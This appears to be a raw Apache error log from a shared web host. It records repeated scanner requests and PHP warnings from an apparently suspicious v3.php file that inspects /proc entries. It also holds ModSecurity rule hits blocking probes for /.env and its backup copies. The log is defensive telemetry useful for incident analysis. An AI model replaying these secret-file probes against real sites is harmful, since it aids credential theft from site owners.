[Tue May 12 04:53:22.010052 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.136553 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.261320 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.386544 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.633040 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.759217 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:22.884813 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:23.011828 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:23.637244 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:23.763730 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:23.892684 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.019052 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.145756 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.267578 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.400432 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.524855 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.648617 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:24.770417 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:25.383959 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:25.504818 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:25.627050 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:25.870472 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:25.991371 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.238772 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.363378 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.509814 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.631524 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.757958 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.878280 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:26.998720 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.251448 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.385743 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.509223 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.630534 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.751146 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.871573 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:27.992355 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.121513 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.243685 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.364580 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.500301 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.621244 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.741911 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.868053 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:28.991454 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.113030 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.354759 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.482993 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.604331 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.853444 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:29.983853 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:30.229582 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:30.611692 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:30.732807 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:30.857796 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174178/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174178/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174178/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174178/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174178/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174178/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:53:30.978578 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:31.099574 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:31.349799 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:31.728164 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:32.113229 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:32.234489 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:32.355977 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:32.741022 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:32.992940 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:33.117472 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:33.361143 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:33.735322 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:33.856402 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:33.883333 2026] [:error] [pid 1808852:tid 1808868] [client 74.7.243.217:49920] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:53:33.988450 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.109669 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.351690 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.606982 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.727650 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.849138 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:34.969952 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.093268 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.215396 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.340905 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.462706 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.584349 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.712863 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.841150 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:35.962285 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.093427 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.215409 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.337527 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.462365 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.586619 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.591607 2026] [core:error] [pid 1808852:tid 1808857] [client 35.84.29.132:58750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:53:36.591632 2026] [core:error] [pid 1808852:tid 1808857] [client 35.84.29.132:58750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:53:36.709904 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.839645 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:36.974431 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.100376 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.222452 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.344683 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.465803 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.592960 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.716069 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.844766 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:37.967677 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:38.096264 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:38.224224 2026] [proxy_fcgi:error] [pid 1808852:tid 1808863] [client 20.9.31.235:20712] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:57.391234 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agKWRdr1yOh9TvizeziTqQAAAEs"]
[Tue May 12 04:53:57.391451 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agKWRdr1yOh9TvizeziTqQAAAEs"]
[Tue May 12 04:53:58.015075 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWRdr1yOh9TvizeziTqQAAAEs"]
[Tue May 12 04:53:58.049106 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.bak"] [unique_id "agKWRtr1yOh9TvizeziTrgAAAEs"]
[Tue May 12 04:53:58.049311 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.bak"] [unique_id "agKWRtr1yOh9TvizeziTrgAAAEs"]
[Tue May 12 04:53:58.667789 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWRtr1yOh9TvizeziTrgAAAEs"]
[Tue May 12 04:53:58.701252 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.save"] [unique_id "agKWRtr1yOh9TvizeziTsAAAAEs"]
[Tue May 12 04:53:58.701486 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.save"] [unique_id "agKWRtr1yOh9TvizeziTsAAAAEs"]
[Tue May 12 04:53:59.186882 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agKWR3o6NvB9WXx5V-6icwAAAQw"]
[Tue May 12 04:53:59.187146 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agKWR3o6NvB9WXx5V-6icwAAAQw"]
[Tue May 12 04:53:59.299412 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agKWRtr1yOh9TvizeziTsAAAAEs"]
[Tue May 12 04:53:59.360353 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.backup"] [unique_id "agKWR9r1yOh9TvizeziTsgAAAEs"]
[Tue May 12 04:53:59.360579 2026] [security2:error] [pid 1825179:tid 1825209] [client 195.178.110.223:47494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.backup"] [unique_id "agKWR9r1yOh9TvizeziTsgAAAEs"]
[Tue May 12 04:53:59.759211 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agKWR3o6NvB9WXx5V-6icwAAAQw"]
[Tue May 12 04:53:59.796847 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agKWR3o6NvB9WXx5V-6idAAAAQw"]
[Tue May 12 04:53:59.797070 2026] [security2:error] [pid 1730175:tid 1730189] [client 195.178.110.223:47614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agKWR3o6NvB9WXx5V-6idAAAAQw"]
